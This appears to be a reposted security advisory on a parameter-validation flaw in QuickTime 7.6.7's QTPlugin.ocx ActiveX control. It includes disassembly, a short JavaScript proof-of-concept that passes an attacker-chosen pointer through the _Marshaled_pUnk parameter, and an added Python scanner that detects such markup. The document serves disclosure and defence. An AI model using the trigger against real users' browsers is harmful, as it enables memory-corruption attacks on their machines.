QuickTime QTPlugin.ocx control _Marshaled_pUnk parameter verification vulnerability and repair

Source: Internet
Author: User

Affected Versions:

Apple QuickTime Player 7.6.7 (1675)

Vulnerability description:
Apple QuickTime is a popular multimedia player. The QuickTime ActiveX control (QTPlugin.ocx) implements IPersistPropertyBag2::Read (at 1000E330) to process the received params:

.text:1000E330 ; =============== S U B R O U T I N E =======================================
.text:1000E330
.text:1000E330 sub_1000E330    proc near               ; DATA XREF: .rdata:1002E0ECo
.text:1000E330                                         ; .rdata:1002E86Co
.text:1000E330
.text:1000E330 arg_0           = dword ptr  4
.text:1000E330 arg_4           = dword ptr  8
.text:1000E330 arg_8           = dword ptr  0Ch
.text:1000E330
.text:1000E330                 push    esi
.text:1000E331                 mov     esi, [esp+4+arg_0]
.text:1000E335                 mov     ecx, [esi+84h]
.text:1000E33B                 xor     eax, eax
.text:1000E33D                 test    ecx, ecx
.text:1000E33F                 jz      short loc_1000E393
.text:1000E341                 mov     eax, [esp+4+arg_8]
.text:1000E345                 mov     edx, [esp+4+arg_4]
.text:1000E349                 push    eax
.text:1000E34A                 push    edx
.text:1000E34B                 call    sub_100031F0

Execution flow:

sub_10002980+27A
sub_10002980+27A loc_10002BFA:                          ; CODE XREF: sub_10002980+264j
sub_10002980+27A                                        ; sub_10002980+272j
sub_10002980+27A                 push    offset aType    ; "type"
sub_10002980+27F                 push    ebx             ; lpString1
sub_10002980+280                 call    ebp             ; lstrcmpiA
sub_10002980+282                 test    eax, eax
sub_10002980+284                 jnz     short loc_10002C22
sub_10002980+286                 push    edi             ; lpString
sub_10002980+287                 call    ds:lstrlenA
sub_10002980+28D                 cmp     eax, 104h
sub_10002980+292                 jnb     short loc_10002C22
sub_10002980+294                 push    edi             ; lpString2
sub_10002980+295                 lea     edx, [esi+83Ch]
sub_10002980+29B                 push    edx             ; lpString1
sub_10002980+29C                 call    ds:lstrcpyA
sub_10002980+2A2
sub_10002980+2A2 loc_10002C22:                          ; CODE XREF: sub_10002980+284j
sub_10002980+2A2                                        ; sub_10002980+292j
sub_10002980+2A2                 push    offset aMarshaled_punk ; "_Marshaled_pUnk"
sub_10002980+2A7                 push    ebx             ; lpString1
sub_10002980+2A8                 call    ebp             ; lstrcmpiA
sub_10002980+2AA                 test    eax, eax
sub_10002980+2AC                 jnz     short loc_10002C4A
sub_10002980+2AE                 push    edi
sub_10002980+2AF                 call    sub_10001310    ; simple ASCII number to long routine
sub_10002980+2B4                 add     esp, 4
sub_10002980+2B7                 lea     ecx, [esi+13B8h]
sub_10002980+2BD                 push    ecx             ; ppv
sub_10002980+2BE                 push    offset iid      ; iid
sub_10002980+2C3                 push    eax             ; pStm
sub_10002980+2C4                 call    ds:CoGetInterfaceAndReleaseStream ; we have a winner!!
sub_10002980+2CA
sub_10002980+2CA loc_10002C4A:                          ; CODE XREF: sub_10002980+2ACj
sub_10002980+2CA                 push    edi             ; int

The QTPlugin.ocx control checks whether the object's properties contain _Marshaled_pUnk. If they do, it converts the value from ASCII to a numeric address (sub_10001310) and passes the resulting pointer as the pStm argument (the IStream pointer that is supposed to hold the marshaled interface) of CoGetInterfaceAndReleaseStream, in order to obtain the IUnknown pointer (pUnk) of the marshaled interface. In this way the IStream pointer is fully controlled by whoever supplies the property.
Reference:
http://secunia.com/advisories/41213/

Test method:
The program (method) provided on this site may be offensive and is only for security research and teaching. Use it at your own risk!
addr = 354552864; // 0x15220C20 [pUnk]
var obj = '<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" height="0">'
        + '<param name="_Marshaled_pUnk" value="' + addr + '" />'
        + '</object>';
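As an added example (not part of the original advisory or of QuickTime), a small Python scanner that flags HTML handing a _Marshaled_pUnk property to the QuickTime control CLSID, for use in a proxy, mail-gateway or sandbox pipeline. It also decodes the ASCII-decimal value the way the control does, so the analyst sees the pointer that would be unmarshaled; the weak indicator additionally catches the JavaScript-built form from the test method, which a structural parse cannot see. Function and sample names are my own.

```python
from html.parser import HTMLParser

# CLSID of the QuickTime ActiveX control (QTPlugin.ocx) and the property it turns
# straight into an IStream pointer, both as given in the advisory above.
QUICKTIME_CLSID = "02bf25d5-8c17-4b23-bc80-d3488abddc6b"
MARSHALED_PARAM = "_marshaled_punk"

class _ObjectScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hits = []    # raw _Marshaled_pUnk values the control would receive
        self._obj = None  # the <object> currently being walked, if any

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # HTMLParser lowercases attribute names
        if tag == "object":
            self._obj = {"clsid": a.get("classid", ""), "params": {}}
        elif tag == "param" and self._obj is not None:
            self._obj["params"][a.get("name", "").strip().lower()] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "object":
            self._flush()

    def close(self):
        super().close()
        self._flush()  # an <object> left unterminated still counts

    def _flush(self):
        obj, self._obj = self._obj, None
        if obj is None:
            return
        clsid = obj["clsid"].strip().lower().replace("clsid:", "").strip("{}")
        if clsid == QUICKTIME_CLSID and MARSHALED_PARAM in obj["params"]:
            self.hits.append(obj["params"][MARSHALED_PARAM])

def scan_html(text):
    """Return (findings, weak_indicator): findings pairs each raw _Marshaled_pUnk value
    with the pointer the control derives from its ASCII-decimal form (None if not numeric);
    weak_indicator is True when CLSID and parameter name both occur anywhere in the text."""
    scanner = _ObjectScanner()
    scanner.feed(text)
    scanner.close()
    findings = [(raw, int(raw) if raw.strip().isdigit() else None) for raw in scanner.hits]
    return findings, (QUICKTIME_CLSID in text.lower() and MARSHALED_PARAM in text.lower())

# Constructed samples (not from any real page): the <object> form and the JavaScript-assembled form.
SAMPLE_MARKUP = ('<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" '
                 'height="0"><param name="_Marshaled_pUnk" value="354552864" /></object>')
SAMPLE_SCRIPT = ('<script>var obj = \'<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B">'
                 '<param name="_Marshaled_pUnk" value="\' + addr + \'" /></object>\';</script>')
```

A hit with a decoded pointer is the strong signal; the weak indicator alone warrants a closer look at the script that builds the markup.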
Security suggestions:
Users should watch the vendor's (Apple) homepage for the latest version: http://www.apple.com
